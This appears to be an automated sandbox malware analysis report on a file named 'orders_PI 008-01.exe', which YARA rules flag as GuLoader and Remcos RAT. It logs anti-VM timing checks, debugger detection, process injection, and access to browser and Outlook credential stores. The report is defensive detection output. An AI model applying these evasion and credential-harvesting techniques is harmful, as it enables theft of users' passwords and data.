              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile written: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\Desktop\orders_PI 008-01.cfgJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: orders_PI 008-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeUnpacked PE file: 5.2.orders_PI 008-01.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeUnpacked PE file: 6.2.orders_PI 008-01.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeUnpacked PE file: 7.2.orders_PI 008-01.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Yara detected GuLoader
              Source: Yara matchFile source: 00000000.00000002.1643832066.00000000046DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_6FF41B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF41B5F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_0462701E push esp; retf 0_2_0462701F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_046242F0 push eax; ret 0_2_046242F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_046227AD push eax; retf 0_2_046227AF
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_046235B7 push 58C714BAh; iretd 0_2_046235C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_04623D89 push eax; retf 0_2_04623D97
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B2806 push ecx; ret 3_2_344B2819
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344BB4B5 push esi; ret 3_2_344BB4BE
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344C1219 push esp; iretd 3_2_344C121A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_01AA27AD push eax; retf 3_2_01AA27AF
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_01AA35B7 push 58C714BAh; iretd 3_2_01AA35C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_01AA3D89 push eax; retf 3_2_01AA3D97
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_01AA42F0 push eax; ret 3_2_01AA42F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_01AA701E push esp; retf 3_2_01AA701F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00451D34 push eax; ret 6_2_00451D41
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile created: C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeAPI/Special instruction interceptor: Address: 4D4B883
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeAPI/Special instruction interceptor: Address: 21CB883
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeRDTSC instruction interceptor: First address: 4D24840 second address: 4D24840 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F488D312D8Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeRDTSC instruction interceptor: First address: 21A4840 second address: 21A4840 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F488D07D97Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeWindow / User API: threadDelayed 9292Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeWindow / User API: foregroundWindowGot 1769Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7360Thread sleep count: 260 > 30Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7360Thread sleep time: -130000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356Thread sleep count: 178 > 30Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356Thread sleep time: -534000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356Thread sleep count: 9292 > 30Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356Thread sleep time: -27876000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,3_2_344B10F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,LdrInitializeThunk,3_2_344B6580
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`EY
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv2901.tmp.5.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeAPI call chain: ExitProcess graph end nodegraph_0-2680
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeAPI call chain: ExitProcess graph end nodegraph_0-2893
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeAPI call chain: ExitProcess graph end nodegraph_6-34110
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_0040324C LdrInitializeThunk,GetTickCount,GetTickCount,GetTickCount,MulDiv,wsprintfW,0_2_0040324C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_344B60E2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_6FF41B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF41B5F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B4AB4 mov eax, dword ptr fs:[00000030h]3_2_344B4AB4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B724E GetProcessHeap,3_2_344B724E
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_344B60E2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B2639 LdrInitializeThunk,IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk,3_2_344B2639
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_344B2B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: NULL target: C:\Users\user\Desktop\orders_PI 008-01.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: NULL target: C:\Users\user\Desktop\orders_PI 008-01.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: NULL target: C:\Users\user\Desktop\orders_PI 008-01.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"Jump to behavior
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\b
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\*U
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\Z
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\a6
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\~
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\y
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\*G
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\6
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\L
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\k
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHD
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\1
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\p
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.drBinary or memory string: [Program Manager]
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\35
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3T\13
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B2933 cpuid 3_2_344B2933
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_344B2264
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_004034A2 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_004034A2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
